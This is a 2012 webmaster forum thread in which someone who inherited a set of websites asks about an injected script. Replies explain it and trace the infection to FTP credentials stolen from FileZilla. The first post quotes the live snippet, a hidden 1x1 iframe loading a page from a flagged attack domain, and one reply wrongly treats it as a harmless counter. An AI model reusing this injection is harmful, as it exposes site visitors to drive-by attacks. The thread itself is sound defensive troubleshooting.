1. Home
  2. Forums Index
  3. WebmasterWorld / Webmaster General 10:27 am May 21, 2026

Forum Moderators: phranque

Message Too Old, No Replies

What is the function of this script in a website I'm inheriting

Concerned because it contains a url to a 'known attack site'

         

Anonymoose

12:43 pm on Jun 24, 2012 (gmt 0)

10+ Year Member



A set of websites I inherited have a script on them that worries me. I suspect he used it to generate page stats, but am not certain. If so, why is the url to a known attack site according to a couple of security programs. I would have assumed that the ISP would generate extensive stats that could be used and wouldn't require a separate URL? The ISP is web66.com The offending url is onmouseup.info.

If I delete the entire script from the source code, ALL of the source code disappears from the entire page.

Regardless, here's the script- I hope it posts properly...

<script>var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script><!--/c3284d-->

I'll be most grateful to anyone who can shed some meaningful light on this.

lucy24

10:09 pm on Jun 24, 2012 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



If I delete the entire script from the source code, ALL of the source code disappears from the entire page.

Obvious question first: Is this behavior exactly the same, whether or not you are in fact using MSIE || Firefox?

:: wandering off thinking evil thoughts about buggy site whose webmaster went AWOL in 2009 ::

Anonymoose

10:38 pm on Jun 24, 2012 (gmt 0)

10+ Year Member



Lucy24, I don't understand your question? I was using HTML-Kit to edit the source code on a copy of the site that I'd downloaded to my computer. When I deleted that script just to see what if anything would change on the page, ALL of the page coding disappeared too (from the html editing panel). Of course I could just hit 'undo' and have it all back - including the questionable script. That behavior made me even more suspicious that it's somehow malicious coding - why won't it let me delete the script just to see the effect on the site?

Maybe it's innocuous and I'm just too green, but that it contains the url to a known attack site, and appears to be hidden, and won't let me delete it without deleting the entire page all makes me suspicious so I'm trying to find out what's going on...

Anonymoose

11:54 pm on Jun 24, 2012 (gmt 0)

10+ Year Member



Now I'm more perplexed - just went back into the index page using HTTrack as editor, and this time it let me delete the script without problem.

I'd still like to know what the script is supposed to do, how it affects people surfing the site, and how to clean it thoroughly from the sites assuming it is malicious.

Shotgunning on the web, I did find it as malicious on Sucuri Malware Labs (http://labs.sucuri.net/?details=onmouseup.info) but I have no idea how reputable they are or aren't, and it provides zero information about what this script does.

g1smd

12:17 am on Jun 25, 2012 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



"If the visiting UA is Firefox or MSIE, append an invisible 1 pixel iframe to the body, position it top left on screen, and within it load something which counts this pageview."

Anonymoose

1:06 am on Jun 25, 2012 (gmt 0)

10+ Year Member



Ok... and thank you for the code to english translation!

Any idea why would it do that, and why is it considered to be malicious? What harm does or can it do to site visitors or site integrity? The hosting company wouldn't be using a known attack site to track page views for basic website stats, would they? Or maybe the webmaster was using an outside source for site stats and didn't realize that it's had problems with attack code of some sort?

lucy24

3:32 am on Jun 25, 2012 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



What does

<!--/c3284d-->

mean? Or is it just a cross-reference to something like the counter number?

More to the point: Why do they need to do all that "createElement('iframe')" and "getElementsByTagName" business instead of just shoving in a 1x1 transparent gif like the rest of us? For that matter, why even bother to check UA? Wouldn't it be easier to pull all the data and then delete the webkits and operas at your leisure?

Anonymoose

4:10 am on Jun 25, 2012 (gmt 0)

10+ Year Member



Lucy24, your guess is as good as mine on the <!--/c3284d-->. Looks like an html comment, but what the heck it means or why it's there I have no clue and wondered also. There are a couple more of them in the same vicinity - no idea if the current guy put them there, or maybe it's something HTTrack does when downloading a site? (doubt it)...

Anyhow, I figured that was less important than the script issue by far. I posted that over at [badwarebusters.org...] also. A moderator there also said its malicious (but not why). If I understand his reply correctly, he's saying that the thing downloads the entire contents (whatever that may be) of that onmouseup.info page anytime a webpage with that script is loaded in IE or Firefox....

So I'm still confused about how it would have gotten there and exactly what it's supposed to do.

Leosghost

6:26 am on Jun 25, 2012 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Guessing it is c <= counter 3284 <= counter number d <= reference of some sort..in a comment

It doesn't download the entire contents of the other site page..it does what g1smd says it does..it loads a single pixel and counts how many times it loads it..

It could do other stuff ( which could be malicious if set up right )..but at the moment it isn't..

tiger

1:22 pm on Jun 27, 2012 (gmt 0)

10+ Year Member



Hi all
I have the same problem on my website

I found every index.asp or index.aspx pages was infested by the code in the first post. I have removed the code but Google is telling mne there is a malware. Perhaps occur some days to back to the orihginal status.
I have found the problem. It is by steal your password in FTP client(I use Filezilla) so a post that explain in detailed manner this is here

[edited by: engine at 3:36 pm (utc) on Jun 27, 2012]
[edit reason] removed links to protect others from potential malware [/edit]

tiger

4:04 pm on Jun 27, 2012 (gmt 0)

10+ Year Member



Excuse me for post link on my website enterely, however the second was good for explaininmg the problem. The problem is in account FTP of filezilla this file: sitemanager.xml located in

users/user/AppData/FileZilla

change FTP password

jimbeetle

9:43 pm on Jun 27, 2012 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



change FTP password

And give the machine you use for FTP a good scrub, it might have been infected by a keylogger.

tiger

8:38 am on Jun 28, 2012 (gmt 0)

10+ Year Member



Yes infact the best is a method to crypt FTP file with software truecrypt. I have a problem with my PC but on my Virtual machine it works. So I advice thi:s in this manner sitemanager.xml is crypted and the the file is deleted once you have uploaded the files.
In the meanwhile my website is comeback to normal
 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

  1. Home
  2. Forums Index
  3. WebmasterWorld / Webmaster General 10:27 am May 21, 2026